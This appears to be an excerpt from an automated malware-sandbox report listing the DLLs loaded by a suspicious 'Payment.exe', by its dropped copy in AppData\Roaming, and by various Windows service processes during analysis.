                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: drprov.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winsta.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntlanman.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: davclnt.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: davhlpr.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: wkscli.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: cscapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: netutils.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: browcli.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: rasadhlp.dll
